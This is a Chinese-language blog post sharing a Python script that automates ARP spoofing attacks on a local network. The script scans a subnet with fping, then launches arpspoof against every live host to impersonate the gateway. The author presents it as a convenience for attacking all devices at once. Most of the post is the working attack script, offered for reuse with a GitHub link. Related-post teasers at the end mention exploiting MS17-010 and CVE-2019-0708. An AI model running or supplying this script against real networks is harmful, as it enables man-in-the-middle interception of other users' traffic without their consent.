最近用到ARP欺骗攻击这个工具,发现了一些问题:由于不确定局域网中具体哪台设备才是你的攻击对象,所以我一般都会采用全部攻击的方式。但是这又会引申出另一个问题:首先需要扫描存活主机,然后再将存活的主机IP地址挨个进行手工攻击(可能有批量攻击的功能,但是我太笨了,没找到)。于是乎,我直接写了一个自动化处理脚本,让其自动扫描存活主机,然后进行自动攻击。

思路是这样的:首先执行fping将局域网中的存活主机ip地址保存到一个文件。然后程序打开该文件将每行ip地址读取并存放到一个列表变量中。最后拼接命令利用for语句进行批量攻击。

我也很不要脸的把它放到了GitHub,以后有机会再更新吧:GitHub连接


#import commands
import os
import re
print("################################")
print("#\n#\n    By:Zhuyingjie \n#\n#")
print("################################")
IP =  raw_input("Please enter the attack network address(like 192.168.0.1/24):")
IP = str(IP)
att1 = 'fping -ags '
att2 = ' > ip.txt'
IP = att1 + IP + att2
print("Construct command:"+ IP)                                                 #拼接指令
print("\n Scanning.........")
os.system(IP)                                                                   #执行命令,将结构保存到txt
list = []                                                                       #空列表,用于存放扫描到的IP
n = 0
cmd1 = "gnome-terminal -e \'arpspoof -i eth0 -t "
cmd2 = " 192.168.0.1\'"
f = open('ip.txt','r')                                        
if(f !=0):
    print('open file success!')
    print('output:')
    for echo in f:
        list.append(echo)                                                       #扫描结构读入到列表
        CMD = cmd1 + str(list[n]) + cmd2                                        #拼接指令
        n = n+1
        print ("The spoofed IP address is" + CMD)
        os.system(CMD)                                                          #执行攻击程序
    f.close()
else:
    print('erro!!') 
相关文章
评论
分享
  • 三大路由协议是如何撤销路由的?

    首先感谢王欣超和任培强两位网络工程师的指导!三大路由协议包括:OSPF、ISIS、BGP细想这些协议技术的产生其实挺有意思的,由于都是人将其研发出来的,所以协议的很多机制都挺人性化。比如OSPF的邻居建立,它就像两个人第一次见面建立邻...

    三大路由协议是如何撤销路由的?
  • OSPF的防环机制(转载)

    OSPF与距离矢量路由协议不同,运行OSPF的路由器之间交互并不是路由信息,而是LSA,而路由器的计算正是基于网络中所泛洪的各种LSA,所以实际上OSPF路由的环路规避机制还得依赖LSA在环路避免上的设计。 先来看看第一种:Type-...

    OSPF的防环机制(转载)
  • 利用ms17_010漏洞攻陷windows server 2012服务器

    这几天给客户装了好多服务器,很多系统是windows server 2012 R2的,装完后也没有打补丁,然后我就对这个没打补丁的系统扫了一下还真发现了高危漏洞。(比较简单,不喜勿喷) 首先自己搭建的环境:kali linux (19...

    利用ms17_010漏洞攻陷windows server 2012服务器
  • CVE-2019-0708漏洞利用

    CVE-2019-0708漏洞利用9月7日上午,群里被CVE-2019-0708漏洞刷屏,原来是那个号称wannacry级别的漏洞 BlueKeep(CVE-2019-0708)漏洞利用发布了。吓得老夫赶紧打开虚拟机更新了一下kali...

    CVE-2019-0708漏洞利用
  • HCNP-Routing&Switching-IEEP H12-233知识点整理

    网络规划网络规划调研分析项目背景,确定用户的需求和目标,确定技术方向。 目标:项目背景、确定需求、技术方向。 项目背景方式:调查、沟通、报告 项目范围:工程边界、功能边界、覆盖范围 WBS:工作分解结构 把整个项目分解成较小的,更易于...

    HCNP-Routing&Switching-IEEP H12-233知识点整理